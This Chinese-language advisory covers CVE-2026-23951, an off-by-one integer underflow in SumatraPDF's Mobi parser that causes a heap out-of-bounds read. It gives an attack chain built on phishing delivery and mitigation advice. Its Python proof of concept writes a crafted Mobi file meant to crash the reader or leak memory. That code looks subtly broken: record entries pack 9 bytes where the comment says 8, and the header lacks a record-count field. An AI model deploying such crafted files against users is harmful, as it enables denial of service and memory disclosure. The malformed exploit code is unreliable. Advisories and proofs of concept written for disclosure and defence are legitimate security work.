CVE-2026-23951 SumatraPDF off-by-one整数下溢漏洞

漏洞信息

漏洞编号

CVE-2026-23951

漏洞类型

off-by-one错误/整数下溢/缓冲区溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SumatraPDF

漏洞概述

CVE-2026-23951是SumatraPDF多格式阅读器中的一个安全漏洞。SumatraPDF是Windows平台下流行的PDF、EPUB、Mobi等多种文档格式的阅读器。该漏洞存在于PalmDbReader::GetRecord函数的验证代码中，是一个off-by-one错误（差一错误），专门在处理恰好包含2条记录的Mobi文件时触发。攻击者可以构造一个恶意Mobi文件，当用户使用SumatraPDF打开该文件时，验证逻辑中的边界检查存在缺陷，导致整数下溢，进而引发堆越界读取（out-of-bounds heap read）。这不仅会造成应用程序崩溃，还可能被攻击者利用来读取敏感内存数据。在漏洞披露时，官方尚未发布修复补丁，所有SumatraPDF版本均受影响。

技术细节

该漏洞的核心问题在于PalmDbReader::GetRecord函数中的记录数量验证逻辑存在off-by-one错误。具体来说，当处理Mobi文件格式时，代码对记录数量的验证检查边界条件设置不当，当记录数量恰好等于2时，验证逻辑触发错误路径，导致后续的大小计算发生整数下溢（integer underflow）。在正常的内存分配和访问逻辑中，记录大小应该是正数，但由于整数下溢，计算出的「大小」变成了一个极大的负数或极小的异常值。当程序尝试根据这个异常大小进行堆内存读取时，就会发生越界读取（out-of-bounds read），访问本不属于该记录区域的堆内存。这种越界读取可能导致：1）读取到其他堆对象的敏感数据；2）访问未映射内存区域导致程序崩溃；3）在特定条件下可能泄露关键内存信息。攻击者只需构造一个特殊的Mobi文件并诱骗用户打开即可触发此漏洞。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意构造的Mobi文件，该文件具有恰好2条记录，用于触发PalmDbReader::GetRecord中的off-by-one验证错误

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意网站下载、即时通讯等方式将恶意Mobi文件传递给目标用户

STEP 3

步骤3

目标用户在SumatraPDF中打开该恶意Mobi文件，触发PalmDbReader::GetRecord函数的验证逻辑

STEP 4

步骤4

验证代码中的off-by-one错误在处理2条记录时被触发，导致整数下溢计算错误

STEP 5

步骤5

基于错误的整数计算，程序执行堆越界读取，访问超出合法内存边界的堆区域

STEP 6

步骤6

越界读取导致应用程序崩溃（拒绝服务），或在特定条件下可能泄露敏感内存数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-23951 PoC - SumatraPDF off-by-one Integer Underflow
# This PoC generates a crafted Mobi file that triggers the vulnerability

import struct
import sys

def create_poc_mobi(filename):
    """
    Create a minimal Mobi file that triggers the off-by-one error
    in PalmDbReader::GetRecord when record_count == 2
    """
    
    # PDB Header (78 bytes)
    pdb_name = b"BOOKMOBI" + b"\x00" * (32 - 8)  # 32 bytes name
    attributes = struct.pack(">H", 0x0002)  # Database attributes
    version = struct.pack(">H", 0)  # Version
    creation_time = struct.pack(">I", 0)  # Creation time
    modification_time = struct.pack(">I", 0)  # Modification time
    backup_time = struct.pack(">I", 0)  # Backup time
    modification_number = struct.pack(">I", 0)  # Modification number
    app_info_offset = struct.pack(">I", 78)  # App info offset
    sort_info_offset = struct.pack(">I", 78)  # Sort info offset
    type_creator = b"BOOK" + b"MOBI"  # Type and creator
    
    # Record List Entry (8 bytes each)
    record_data_offset = struct.pack(">I", 0)  # Data offset
    record_attributes = struct.pack(">B", 0)  # Record attributes
    unique_id = struct.pack(">I", 0)  # Unique ID
    
    # PalmDOC Header (16 bytes)
    text_length = struct.pack(">I", 0)  # Text length
    record_count = struct.pack(">H", 2)  # Record count = 2 (triggers bug)
    record_size = struct.pack(">H", 4096)  # Record size
    reserved = struct.pack(">I", 0)  # Reserved
    
    # Build the file
    pdb_header = (pdb_name + attributes + version + creation_time + 
                  modification_time + backup_time + modification_number +
                  app_info_offset + sort_info_offset + type_creator)
    
    # Record list with exactly 2 records
    record_list = b""
    for i in range(2):
        record_list += record_data_offset + record_attributes + unique_id
    
    palm_doc_header = text_length + record_count + record_size + reserved
    
    # Malformed record data that triggers the off-by-one
    # The validation code fails when record_count == 2
    record_data = b"A" * 100  # Minimal record data
    
    with open(filename, "wb") as f:
        f.write(pdb_header)
        f.write(record_list)
        f.write(palm_doc_header)
        f.write(record_data)
    
    print(f"[+] PoC file created: {filename}")
    print(f"[+] Record count set to 2 (triggers off-by-one)")
    print(f"[+] Open this file with SumatraPDF to trigger the vulnerability")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python cve-2026-23951-poc.py <output.mobi>")
        sys.exit(1)
    create_poc_mobi(sys.argv[1])

影响范围

SumatraPDF 所有版本

防御指南

临时缓解措施

由于目前官方尚未发布修复补丁，建议采取以下临时缓解措施：1）不要打开来源不明的Mobi文件，对所有外部来源的电子书保持警惕；2）使用杀毒软件扫描下载的电子书文件；3）考虑使用其他文档阅读器作为临时替代方案；4）在沙箱或虚拟机环境中打开可疑文件；5）关注SumatraPDF官方GitHub仓库和安全公告，获取最新安全更新。